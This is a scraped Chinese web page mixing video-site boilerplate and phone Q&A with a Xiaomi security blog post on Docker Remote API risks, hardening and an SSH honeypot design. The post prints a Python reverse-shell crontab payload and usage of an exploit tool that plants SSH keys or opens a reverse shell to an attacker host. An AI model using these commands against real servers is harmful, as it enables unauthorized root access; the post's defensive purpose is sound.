更多频道内容在这里查看
爱奇艺用户将能永久保存播放记录
过滤短视频
暂无长视频（电视剧、纪录片、动漫、综艺、电影）播放记录，
按住视频可进行拖动
&正在加载...
举报视频：
举报原因(必填)：
请说明举报原因(300字以内)：
请输入您的反馈
举报理由需要输入300字以内
感谢您的反馈～
请勿重复举报~
请刷新重试~
收藏成功，可进入
查看所有收藏列表
当前浏览器仅支持手动复制代码
视频地址：
flash地址：
html代码：
通用代码：
通用代码可同时支持电脑和移动设备的分享播放
用爱奇艺APP或微信扫一扫，在手机上继续观看
当前播放时间：
一键下载至手机
限爱奇艺安卓6.0以上版本
使用微信扫一扫，扫描左侧二维码，下载爱奇艺移动APP
其他安装方式：手机浏览器输入短链接http://71.am/udn
下载安装包到本机：
设备搜寻中...
请确保您要连接的设备（仅限安卓）登录了同一爱奇艺账号 且安装并开启不低于V6.0以上版本的爱奇艺客户端
连接失败！
请确保您要连接的设备（仅限安卓）登录了同一爱奇艺账号 且安装并开启不低于V6.0以上版本的爱奇艺客户端
部安卓（Android）设备，请点击进行选择
请您在手机端下载爱奇艺移动APP（仅支持安卓客户端）
使用微信扫一扫，下载爱奇艺移动APP
其他安装方式：手机浏览器输入短链接http://71.am/udn
下载安装包到本机：
爱奇艺云推送
请您在手机端登录爱奇艺移动APP（仅支持安卓客户端）
使用微信扫一扫，下载爱奇艺移动APP
180秒后更新
打开爱奇艺移动APP，点击“我的-扫一扫”，扫描左侧二维码进行登录
没有安装爱奇艺视频最新客户端？
小米手机如何快捷的进行安全操作？安全中心快捷功能可以帮助你
正在检测客户端...
您尚未安装客户端，正在为您下载...安装完成后点击按钮即可下载
30秒后自动关闭
小米手机如何快捷的进行安全操作？安全中心快捷功能可以帮助你">小米手机如何快捷的进行安全操作？安全中心快捷功能可以帮助你
请选择打赏金额：
播放量12.7万
播放量数据：快去看看谁在和你一起看视频吧~
更多数据：
热门短视频推荐
Copyright (C) 2018 & All Rights Reserved
您使用浏览器不支持直接复制的功能，建议您使用Ctrl+C或右键全选进行地址复制
正在为您下载爱奇艺客户端安装后即可快速下载海量视频
正在为您下载爱奇艺客户端安装后即可免费观看1080P视频
&li data-elem="tabtitle" data-seq="{{seq}}"& &a href="javascript:void(0);"& &span>{{start}}-{{end}}&/span& &/a& &/li&
&li data-downloadSelect-elem="item" data-downloadSelect-selected="false" data-downloadSelect-tvid="{{tvid}}"& &a href="javascript:void(0);"&{{pd}}&/a&
选择您要下载的《
后才可以领取积分哦~
每观看视频30分钟
+{{data.viewScore}}分
{{data.viewCount}}/3
{{if data.viewCount && data.viewCount != "0" && data.viewCount != "1" && data.viewCount != "2" }}
访问泡泡首页
+{{data.rewardScore}}分
{{if data.rewardCount && data.rewardCount != 0 && data.getRewardDayCount != 0}}1{{else}}0{{/if}}/1
{{if data.rewardCount && data.rewardCount != 0 && data.getRewardDayCount != 0}}
+{{data.signScore}}分
{{data.signCount}}/1
{{if data.signCount && data.signCount != 0}}
色情低俗内容
血腥暴力内容
广告或欺诈内容
侵犯了我的权力
还可以输入
您使用浏览器不支持直接复制的功能，建议您使用Ctrl+C或右键全选进行地址复制小米安全中心能限制流氓APP吗？ - 知乎13被浏览<strong class="NumberBoard-itemValue" title="分享邀请回答12 条评论分享收藏感谢收起12 条评论分享收藏感谢收起写回答1 个回答被折叠（）小米安全中心
Docker Remote api在安全中的应用杂谈
netxfly 于
10:00:00 发表
注：本文为“小米安全中心”原创，转载请联系“小米安全中心”
众所周知，Docker daemon默认是监听在unix socket上的，如unix:///var/run/docker.sock。官方还提供一个Rustful api接口，允许通过TCP远程访问Docker，例如执行以下启动参数可以让docker监听在本地所有地址的2375端口上：
dockerd -H=0.0.0.0:2375 -H unix:///var/run/docker.sock
之后就可以用docker client或任意http客户端远程访问了：
$ curl http://10.10.10.10:2375/containers/json[]docker -H=tcp://10.10.10.10:2375 ps
CONTAINER ID
但是开启这种没有任何访问控制的Docker remote Api服务是非常危险的，攻击者发现后可以轻松地拿下整个服务器的权限。
Docker remote Api未授权访问的攻击原理与之前的Redis未授权访问漏洞大同小异，都是通过向运行该应用的服务器写文件，从而拿到服务器的权限，常见的利用方法如下：
启动一个容器，挂载宿主机的/root/目录，之后将攻击者的ssh公钥~/.ssh/id_rsa.pub的内容写到入宿主机的/root/.ssh/authorized_keys文件中，之后就可以用root账户直接登录了启动一个容器，挂载宿主机的/etc/目录，之后将反弹shell的脚本写入到/etc/crontab中，攻击者会得到一个反弹的shell，其中反弹shell脚本的样例如下： echo -e "*/1 * * * * root /usr/bin/python -c 'import socket,subprocess,s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",8088));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" && /etc/crontab
第2种利用方法也可以挂载var/spool/cron/目录，将反弹shell的脚本写入到/var/spool/cron/root（centos系统）或/var/spool/cron/crontabs/root(ubuntu系统)
手工利用方法网上有很多，就不多说了，笔者直接给出一个go语言版的自动化利用工具，github地址为：https://github.com/netxfly/docker-remote-api-exp，使用方法如下：
$ ./remote_api_expUsage of ./remote_api_exp:
-pubkey string
id_rsa.pub file (default "/root/.ssh/id_rsa.pub")
-reverse string
reverse address, 6.6.6.6:8888
-target string
target ip, 1.1.1.1:2375
-type string
Type, such as check, root, shell (default "check")
-version string
Docker version:
---------------------------
Docker version
API Version
---------------------------
1.18 (default "1.12")
./remote_api_exp -type=check -target=ip:2375，获取服务器信息，如操作系统，机器名，remote api版本以及docker的安装位置等./remote_api_exp -type=root -target=ip:2375 -version=1.12.3，在/root/.ssh/authorized_keys写入攻击者的ssh公钥./remote_api_exp -type=shell -target=ip:2375 -version=1.12.3 -reverse=attackerIp:8888，给攻击者反弹一个shell
1.以root账户登录
2.获取一个反弹shell
也许有运维同学觉得这是因为监听在了外网，所以攻击者才有机会攻击，如果我不监听在外网就没有安全隐患了，其实监听在内网也有以下安全隐患：
外网攻击者可以通过WEB应用的SSRF漏洞，间接地攻击内网中的这些未授权的Docker remote api服务；方便已经攻入内网的攻击者扩大攻击范围；可能会被内部别有用心的人攻击，然后窃取敏感数据。
在不必需的情况下，不要启用docker的remote api服务，如果必须使用的话，可以采用如下的加固方式：
设置ACL，仅允许信任的来源IP连接；设置TLS认证，官方的文档为Protect the Docker daemon socket
客户端与服务器端通讯的证书生成后，可以通过以下命令启动docker daemon：
docker -d --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=tcp://10.10.10.10:2375 -H unix:///var/run/docker.sock
客户端连接时需要设置以下环境变量
export DOCKER_TLS_VERIFY=1export DOCKER_CERT_PATH=~/.dockerexport DOCKER_HOST=tcp://10.10.10.10:2375export DOCKER_API_VERSION=1.12
以上咱们回顾了下docker remote api未授权访问认证的安全风险与利用方法，接下来咱们再切换到安全建设视角，用docker remote api构建一个可自动弹性伸缩的ssh蜜罐系统。
现在有不少安全从业者使用docker来做为蜜罐的沙箱了，但是存在一个普通的问题是：所有攻击者连接的都是同一个沙盒，放在外网的沙盒，经常会有多个攻击者同一时间段进入的可能，他们彼此之间可能会看到对方的行为从而识破蜜罐或者为我们单独分析日志造成干扰。
我们的愿景是让所有攻击者都能用上独立的沙盒。您来的时候自动为您开一个全新的沙盒，然后默默地记录下您的操作行为，您走后一段时间会自动销毁沙盒，把资源预留出来接待其他即将到来的黑客兄弟们。
本套系统由Agent与Docker server组成，docker server需要开启docker remote api服务。
Agent可以部署在多个不同的节点上，通过检测本地的ssh log，确定是否有破解行为，如果有破解密码行为且超过3次，就会通过remote api接口在docker server中启动一个新的容器，然后将攻击者的流量转发到这个容器中。
Agent运行的效果如下所示：
然后在docker服务器可以通过ps命令看到刚才新创建的ssh蜜罐沙盒，如下所示：
本系统由go语言实现，可以编译为独立的二进制文件，部署时直接将二进制文件上传到相应的服务器运行起来即可。
程序启动时会加载配置文件，配置文件选项如下图所示：
配置参数说明：
DOCKER_HOST为Docker服务器的IPDOCKER_API为Docker remote api的地址API_VERSION为Docker remote api的版本号DOCKER_CERT为Docker的客户端证书INTERFACE为Agent部署蜜罐的网卡名称WHITE_IPLIST为白名单，对这些来源IP不做防御MAX_HONEYPOTS，表示Docker服务器中最大允许启动的容器数sshd_log为Agent中本地openssh的log目录（默认为/var/log）
配置文件处理的代码如下所示：
其中Cache是一个map[string]*cache.Cache，其中维护了每个容器的状态，比如攻击者的IP，攻击者次数，超时时间等信息。
主程序的代码如下：
package mainimport (
"xsec-ssh-honeypot/settings"
"xsec-ssh-honeypot/util")
func main() {
go util.MonitorLog(settings.SshLog)
util.Schedule(30)}
util.MonitorLog协程会监视Agent的ssh log，并检测是否有密码破解行为。util.Schedule是个定期任务，这里是每30秒执行一次，每次主要完成以下任务：刷新攻击流量转移策略检查是否有超时的攻击者的容器，如果有就关闭掉并释放资源
MonitorLog的代码如下所示：
如果有新的ssh log进来就会交给CheckSSH(logContent *tail.Line)函数处理，CheckSSH(logContent *tail.Line)配置文件处理的代码如下所示：
程序会在全局变量中settings.Cache中维护每个攻击者的来源IP，攻击次数与超时时间，如果攻击次数大于3则会为该攻击者新开一个容器，并将该攻击者的流量从Agent中直接转移到后端新开的ssh蜜罐中。
攻击者的流量转移到后端密码是通过iptables实现的，部分代码如下所示：
注：本文为“小米安全中心”原创，转载请联系“小米安全中心”小米3怎么设置软件锁
我想设置软件锁
按时间排序
小米手机可以通过访问限制功能来给应用加密，具体设置方法如下：1、打开手机【设置】；2、点击进入【安全和隐私】；3、点击进入【访客和访问限制】后点击打开【访问限制】，输入锁屏密码然后绘制访问限制密码；4、绘制好密码后点击进入【设置限制访问的应用】选择需要加密的应用。
可以在软件里面设置。开启小米盒子3，点击需要开机自启的软件。点击遥控器上的“菜单”按键，将光标移到“开机启动”选项，可以看到是“关闭”模式。用遥控器的方向键，点击右键，调适成“开启”状态即可。
下个360优化大师，那里面有系统软件自启管理
嗨！如需管理小米3的开机启动应用，可进入安全中心--授权管理--自启动应用管理 对开机启动项进行管理。感谢您的支持，祝您生活愉快！
在安全中心里面有
感谢您为社区的和谐贡献力量请选择举报类型
经过核实后将会做出处理感谢您为社区和谐做出贡献
确定要取消此次报名，退出该活动？
请输入私信内容：}